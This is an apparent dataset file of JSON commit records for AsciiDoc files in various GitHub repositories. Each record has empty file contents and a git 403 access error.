{"commit":"177f92119bcdfe37c07bc0f60d43cd29d845cace","subject":"y2b create post Galaxy S6 Active vs Slapshot!","message":"y2b create post Galaxy S6 Active vs Slapshot!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-11-30-Galaxy-S6-Active-vs-Slapshot.adoc","new_file":"_posts\/2015-11-30-Galaxy-S6-Active-vs-Slapshot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"264ddc1255769687094278310246ca81c127a014","subject":"Update 2016-04-08-A-quien-le-interese-Semana-2.adoc","message":"Update 2016-04-08-A-quien-le-interese-Semana-2.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-08-A-quien-le-interese-Semana-2.adoc","new_file":"_posts\/2016-04-08-A-quien-le-interese-Semana-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"013f5f5a887006a232949cf30ca25b085dcda8ef","subject":"Update 2016-10-02-Math-Week-4-Proof-Strategies.adoc","message":"Update 
2016-10-02-Math-Week-4-Proof-Strategies.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-10-02-Math-Week-4-Proof-Strategies.adoc","new_file":"_posts\/2016-10-02-Math-Week-4-Proof-Strategies.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74ef292b9e85611e531081c4588ac040f9fdb66f","subject":"Added yum\/apt adoc that was spun out of introduction.adoc.","message":"Added yum\/apt adoc that was spun out of introduction.adoc.\n","repos":"aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms","old_file":"opennms-doc\/guide-install\/src\/asciidoc\/text\/opennms\/repository.adoc","new_file":"opennms-doc\/guide-install\/src\/asciidoc\/text\/opennms\/repository.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aihua\/opennms.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"73763805f20b3bfd6ef4edb251fc5f8fde4fea91","subject":"formatting for the literal text \"C++\"","message":"formatting for the literal text \"C++\"\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a7536fbc1b1bc5b75e8b8319d59a04d398b3fb30","subject":"Update 2018-12-17-second-perspective.adoc","message":"Update 2018-12-17-second-perspective.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-12-17-second-perspective.adoc","new_file":"_posts\/2018-12-17-second-perspective.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18e2c461fa9b3da5d5c10bd9e66f578785ebd8cc","subject":"Update 2014-04-23-Coder-module.adoc","message":"Update 2014-04-23-Coder-module.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2014-04-23-Coder-module.adoc","new_file":"_posts\/2014-04-23-Coder-module.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf4d4996e7c76cb750328c426245e99fea9cbf0b","subject":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","message":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL 
returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b583a726837e07d97b71be3876247bb35a069d35","subject":"CL: string-ends-with","message":"CL: string-ends-with\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"d0887134154f3b22f0b159187c2164e08da3e0a5","subject":"COMPILING: Python 3.x is now supported","message":"COMPILING: Python 3.x is now supported\n","repos":"CWolfRU\/freedoom,CWolfRU\/freedoom","old_file":"COMPILING.adoc","new_file":"COMPILING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CWolfRU\/freedoom.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"c9f520bc7049f57d5a6ee9cbb80b2622027fb620","subject":"Update 2016-01-04-Java-8.adoc","message":"Update 2016-01-04-Java-8.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-01-04-Java-8.adoc","new_file":"_posts\/2016-01-04-Java-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa46ab0a48d99bafc5f7ed859969d9551ae1a512","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/a_little_prayer.adoc","new_file":"content\/writings\/a_little_prayer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"26648b70aabf421d1cdbe55a4442ade69bbbab56","subject":"add readme","message":"add readme\n","repos":"gengjiawen\/AndroidHelper,gengjiawen\/AndroidHelper","old_file":"codegen_util\/Timber\/README.adoc","new_file":"codegen_util\/Timber\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gengjiawen\/AndroidHelper.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e78ba26ed6b17bac13ee00e5dd5444b54591cef","subject":"Worked on documentation.","message":"Worked on documentation.\n","repos":"libyal\/winreg-kb,libyal\/winreg-kb,Acidburn0zzz\/winreg-kb","old_file":"documentation\/Registry files.asciidoc","new_file":"documentation\/Registry files.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Acidburn0zzz\/winreg-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e4fb07da91dedf059b07e703c9327273e88615ad","subject":"Create README.adoc","message":"Create README.adoc","repos":"ksobkowiak-talks\/capgemini-apps-evolve-summit-2017","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ksobkowiak-talks\/capgemini-apps-evolve-summit-2017.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"a577d9cb03681e97886fdcc16a1a0f44a63da106","subject":"added readme","message":"added readme\n","repos":"hivemq\/hivemq-spi","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hivemq\/hivemq-spi.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cb83db2889754003e58a85c324444b83ff7c3540","subject":"Update 2015-09-28-A-Byte-of-Python.adoc","message":"Update 2015-09-28-A-Byte-of-Python.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14e9cd2756ca2f01c90611851cce7020b82b3ea0","subject":"Update 2016-02-08-Introduction.adoc","message":"Update 2016-02-08-Introduction.adoc","repos":"Oziabr\/Oziabr.github.io,Oziabr\/Oziabr.github.io","old_file":"_posts\/2016-02-08-Introduction.adoc","new_file":"_posts\/2016-02-08-Introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Oziabr\/Oziabr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1aec1d6da64f575e5a12381eeb5f8a269989863d","subject":"Update 2016-06-24-Kitchen-Sink.adoc","message":"Update 2016-06-24-Kitchen-Sink.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d41c171e8be5612ce6b30564ca1f0139bd0c629e","subject":"Readme.adoc","message":"Readme.adoc\n","repos":"spring-cloud-stream-app-starters\/http","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud-stream-app-starters\/http.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fbcdc319c03c5d1c4c5543801d29c011e724b526","subject":"Add basic readme","message":"Add basic readme\n","repos":"jpkrohling\/hawkular-btm,objectiser\/hawkular-apm,jpkrohling\/hawkular-apm,hawkular\/hawkular-btm,jpkrohling\/hawkular-apm,jpkrohling\/hawkular-btm,jpkrohling\/hawkular-apm,objectiser\/hawkular-apm,hawkular\/hawkular-apm,jpkrohling\/hawkular-apm,hawkular\/hawkular-btm,objectiser\/hawkular-btm,objectiser\/hawkular-btm,hawkular\/hawkular-btm,jpkrohling\/hawkular-apm,objectiser\/hawkular-apm,hawkular\/hawkular-btm,jpkrohling\/hawkular-btm,objectiser\/hawkular-apm,hawkular\/hawkular-apm,hawkular\/hawkular-apm,jpkrohling\/hawkular-btm,objectiser\/hawkular-btm,hawkular\/hawkular-apm,objectiser\/hawkular-btm,hawkular\/hawkular-apm,jpkrohling\/hawkular-btm,objectiser\/hawkular-apm,objectiser\/hawkular-btm,hawkular\/hawkular-btm","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/jpkrohling\/hawkular-apm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"78fd170740c7d09cb9d6f33c952da64e72a05e83","subject":"Update 2017-03-10-Hello.adoc","message":"Update 2017-03-10-Hello.adoc","repos":"aql\/hubpress.io,aql\/hubpress.io,aql\/hubpress.io,aql\/hubpress.io","old_file":"_posts\/2017-03-10-Hello.adoc","new_file":"_posts\/2017-03-10-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aql\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa87438da67bfee6f7cbea60a8ed9df445019ead","subject":"Create 2018-04-03-test1.adoc","message":"Create 2018-04-03-test1.adoc","repos":"rballan\/rballan.github.io,rballan\/rballan.github.io,rballan\/rballan.github.io,rballan\/rballan.github.io","old_file":"_posts\/2018-04-03-test1.adoc","new_file":"_posts\/2018-04-03-test1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rballan\/rballan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47e3bdefa8988055d7f970c543bb5b5ebe623f94","subject":"add new doc","message":"add new doc\n","repos":"jbosschina\/openshift-cookbooks","old_file":"linux\/dns.adoc","new_file":"linux\/dns.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbosschina\/openshift-cookbooks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c45eea17c4a0e7c973fd74403969eeeb0a23a330","subject":"y2b create post Batman Arkham City Collector's Edition Unboxing","message":"y2b create post Batman Arkham City Collector's Edition Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-18-Batman-Arkham-City-Collectors-Edition-Unboxing.adoc","new_file":"_posts\/2011-10-18-Batman-Arkham-City-Collectors-Edition-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e699fd6ef03b1b1d08c9905795dc3bf821b316cb","subject":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","message":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d7359df2bc5107708ebe48d46fc8fcec419c9dcb","subject":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","message":"Update 
2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"caa7a52fb584934f2cfaffed6c02029576a5726a","subject":"Update 2017-04-05-R.adoc","message":"Update 2017-04-05-R.adoc","repos":"ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io","old_file":"_posts\/2017-04-05-R.adoc","new_file":"_posts\/2017-04-05-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ioisup\/ioisup.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9e667e3e952bc116f7f118a9cf053e912a81e2b","subject":"y2b create post Ever Tried Rolling Your Keyboard?","message":"y2b create post Ever Tried Rolling Your Keyboard?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-08-15-Ever-Tried-Rolling-Your-Keyboard.adoc","new_file":"_posts\/2017-08-15-Ever-Tried-Rolling-Your-Keyboard.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e99f49d8e85208fb4d792a7ddc2f8dbe667b77f","subject":"BendableLongScore contributed by DieterDePaepe","message":"BendableLongScore contributed by DieterDePaepe\n","repos":"bibryam\/optaplanner-website,psiroky\/optaplanner-website,oskopek\/optaplanner-website,psiroky\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,bibryam\/optaplanner-website,oskopek\/optaplanner-website,bibryam\/optaplanner-website,droolsjbpm\/optaplanner-website,psiroky\/optaplanner-website","old_file":"download\/releaseNotes\/releaseNotes6.2.adoc","new_file":"download\/releaseNotes\/releaseNotes6.2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e35a81edf2591772255aad75c5765b9798196fef","subject":"Adding README file to plugin","message":"Adding README file to plugin\n","repos":"aerogear\/aerogear-testing-tools","old_file":"aerogear-test-env-plugin\/README.adoc","new_file":"aerogear-test-env-plugin\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aerogear\/aerogear-testing-tools.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b524246f866d4341520b5402d0b63ffe2131e0ce","subject":"Fixed quotes","message":"Fixed quotes\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week04.asciidoc","new_file":"asciidoc\/week04.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"4a932b6ea618c33158605e8ec94987802d4f2342","subject":"Update 2017-07-03-The-user-friendly-computer-programs.adoc","message":"Update 2017-07-03-The-user-friendly-computer-programs.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-07-03-The-user-friendly-computer-programs.adoc","new_file":"_posts\/2017-07-03-The-user-friendly-computer-programs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"db74f612612ed9cf8ca8c4e4a310a704cceeced8","subject":"landing page for the documentation","message":"landing page for the documentation\n","repos":"noncom\/ccw,michelangelo13\/ccw,noncom\/ccw,noncom\/ccw,laurentpetit\/ccw,michelangelo13\/ccw,ccw-ide\/ccw,michelangelo13\/ccw,ccw-ide\/ccw,ccw-ide\/ccw,laurentpetit\/ccw,laurentpetit\/ccw","old_file":"doc\/src\/index.adoc","new_file":"doc\/src\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/noncom\/ccw.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"}
{"commit":"2de44815eed93933d7bc494b7dca2b61de51bf78","subject":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","message":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"eeb633676c92659c41f62053c67659e9c1c84398","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"2b396794e22cf93cc51f2670e50263cd13910acd","subject":"Update 2015-10-20-nodebrew_install_memo.adoc","message":"Update 2015-10-20-nodebrew_install_memo.adoc","repos":"tom-konda\/blog,tom-konda\/blog,tom-konda\/blog,tom-konda\/blog","old_file":"_posts\/2015-10-20-nodebrew_install_memo.adoc","new_file":"_posts\/2015-10-20-nodebrew_install_memo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tom-konda\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"b5ff9905adda290a33c876c7e128bc7937b91a6a","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"e21f4e2844aa0730e207994b07f6ce43fe1cda26","subject":"Update 2018-01-28-User-friendly-Windows.adoc","message":"Update 2018-01-28-User-friendly-Windows.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2018-01-28-User-friendly-Windows.adoc","new_file":"_posts\/2018-01-28-User-friendly-Windows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"96c30b8d6387468acd3fae12d3b578ad97180ba4","subject":"fix curl snippet that should use GET not OPTIONS (#143)","message":"fix curl snippet that should use GET not OPTIONS (#143)\n\n","repos":"juxt\/yada,mbutlerw\/yada,juxt\/yada,delitescere\/yada,delitescere\/yada,mbutlerw\/yada,delitescere\/yada,mbutlerw\/yada,juxt\/yada","old_file":"doc\/hello.adoc","new_file":"doc\/hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbutlerw\/yada.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"b856261123323d08448ca50f87df3caadd143074","subject":"Renamed '_posts\/2018-11-28-Some-Great-Books-on-Investment.adoc' to '_posts\/2017-11-28-Some-Great-Books-on-Investment.adoc'","message":"Renamed '_posts\/2018-11-28-Some-Great-Books-on-Investment.adoc' to '_posts\/2017-11-28-Some-Great-Books-on-Investment.adoc'","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-28-Some-Great-Books-on-Investment.adoc","new_file":"_posts\/2017-11-28-Some-Great-Books-on-Investment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"09154e438cfca51f53020260b45be663fe63d15c","subject":"Update 2017-10-17-The-journey-to-becoming-a-writer-begins-err-continues.adoc","message":"Update 2017-10-17-The-journey-to-becoming-a-writer-begins-err-continues.adoc","repos":"ahopkins\/amhopkins.com,ahopkins\/amhopkins.com,ahopkins\/amhopkins.com,ahopkins\/amhopkins.com,ahopkins\/amhopkins.com","old_file":"_posts\/2017-10-17-The-journey-to-becoming-a-writer-begins-err-continues.adoc","new_file":"_posts\/2017-10-17-The-journey-to-becoming-a-writer-begins-err-continues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ahopkins\/amhopkins.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"1c854e5e46ff535039cc7c97d0afb3d4ff3ec5ff","subject":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","message":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"e6775b1edd9a029e50e7c4902b79ae7848e4dc5a","subject":"Fix formatting error","message":"Fix formatting error\n","repos":"asashour\/framework,asashour\/framework,Darsstar\/framework,Darsstar\/framework,Darsstar\/framework,Darsstar\/framework,Darsstar\/framework,mstahv\/framework,mstahv\/framework,mstahv\/framework,mstahv\/framework,asashour\/framework,mstahv\/framework,asashour\/framework,asashour\/framework","old_file":"documentation\/articles\/VaadinScalabilityTestingWithAmazonWebServices.asciidoc","new_file":"documentation\/articles\/VaadinScalabilityTestingWithAmazonWebServices.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"f0468510cfe63e035dc51095bea06a829d4ee619","subject":"Update 2013-06-03-Understanding-required-and-allowEmpty-in-CakePHP-validation-rules.adoc","message":"Update 2013-06-03-Understanding-required-and-allowEmpty-in-CakePHP-validation-rules.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2013-06-03-Understanding-required-and-allowEmpty-in-CakePHP-validation-rules.adoc","new_file":"_posts\/2013-06-03-Understanding-required-and-allowEmpty-in-CakePHP-validation-rules.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"e03c9f607eb02df29e433e96e315cde8d9a02473","subject":"Fixed a formatting error","message":"Fixed a formatting error\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week03.asciidoc","new_file":"asciidoc\/week03.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"6f66006911a4fab72f58ff96aad854a1b5e2a6a6","subject":"Update 2016-11-05-Dear-Diary.adoc","message":"Update 2016-11-05-Dear-Diary.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-Dear-Diary.adoc","new_file":"_posts\/2016-11-05-Dear-Diary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
